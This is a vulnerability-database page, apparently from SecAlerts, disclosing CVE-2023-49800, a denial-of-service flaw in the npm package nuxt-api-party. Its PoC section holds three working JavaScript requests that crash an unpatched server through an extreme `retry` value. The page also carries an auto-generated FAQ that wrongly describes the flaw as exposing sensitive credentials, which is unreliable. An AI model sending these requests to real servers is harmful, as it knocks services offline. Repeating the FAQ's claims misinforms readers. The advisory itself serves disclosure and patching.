CVE-2023-49800: Denial of service by abusing `fetchOptions.retry` in nuxt-api-party
First published: Fri Dec 08 2023(Updated: )
### Summary `nuxt-api-party` allows developers to proxy requests to an API without exposing credentials to the client. [`ofetch`](https://github.com/unjs/ofetch) is used to send the requests. The library allows the user to send many options directly to `ofetch`. There is no filter on which options are available. We can abuse the retry logic to cause the server to crash from a stack overflow. ### Details `fetchOptions` [are obtained directly from the request body](https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L27). These are then [passed directly into `ofetch` ](https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L57C15-L57C15). We can construct a URL we know will not fetch successfully, then set the retry attempts to a high value, this will cause a stack overflow as ofetch error handling works recursively. ### PoC POC using Node. ```js await fetch("http://localhost:3000/api/__api_party/MyEndpoint", { method: "POST", body: JSON.stringify({ path: "x:x", retry: 9999999 }), headers: { "Content-Type": "application/json" } }) ``` We can use `__proto__` as a substitute for the endpoint if it is not known. ```js await fetch("http://localhost:3000/api/__api_party/__proto__", { method: "POST", body: JSON.stringify({ path: "x:x", retry: 9999999 }), headers: { "Content-Type": "application/json" } }) ``` We can build the size of the stack faster by using more complicated URIs ```js await fetch("http://localhost:3000/api/__api_party/__proto__", { method: "POST", body: JSON.stringify({ path: "data:x;base64,----", retry: 9999999 }), headers: { "Content-Type": "application/json" } }) ``` ### Impact Full DOS, server is unusable during attack. Requires a single request. ### Fix Limit which options can be passed to `ofetch`.
Credit: security-advisories@github.com security-advisories@github.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| Johannschopplich Nuxt Api Party | <=0.21.3 | |
| npm/nuxt-api-party | <0.22.1 | 0.22.1 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
Frequently Asked Questions
What is the severity of CVE-2023-49800?
CVE-2023-49800 has been classified with a medium severity level due to potential exposure of sensitive data.
How do I fix CVE-2023-49800?
To mitigate CVE-2023-49800, upgrade the nuxt-api-party package to version 0.22.1 or later.
What software is affected by CVE-2023-49800?
CVE-2023-49800 affects nuxt-api-party versions up to 0.21.3.
What vulnerabilities are present in CVE-2023-49800?
CVE-2023-49800 exposes sensitive credentials when making API requests without proper filtering.
Is CVE-2023-49800 remotely exploitable?
Yes, CVE-2023-49800 can be exploited remotely if the affected software is improperly configured.
- collector/nvd-api
- collector/github-advisory-latest
- alias/GHSA-q6hx-3m4p-749h
- alias/CVE-2023-49800
- collector/nvd-cve
- collector/github-advisory
- agent/type
- agent/author
- agent/softwarecombine
- agent/first-publish-date
- collector/mitre-cve
- source/MITRE
- agent/weakness
- agent/references
- agent/last-modified-date
- agent/severity
- agent/title
- agent/description
- agent/event
- agent/trending
- agent/tags
- agent/source
- vendor/johannschopplich
- canonical/johannschopplich nuxt api party
- version/johannschopplich nuxt api party/0.21.3
- package-manager/npm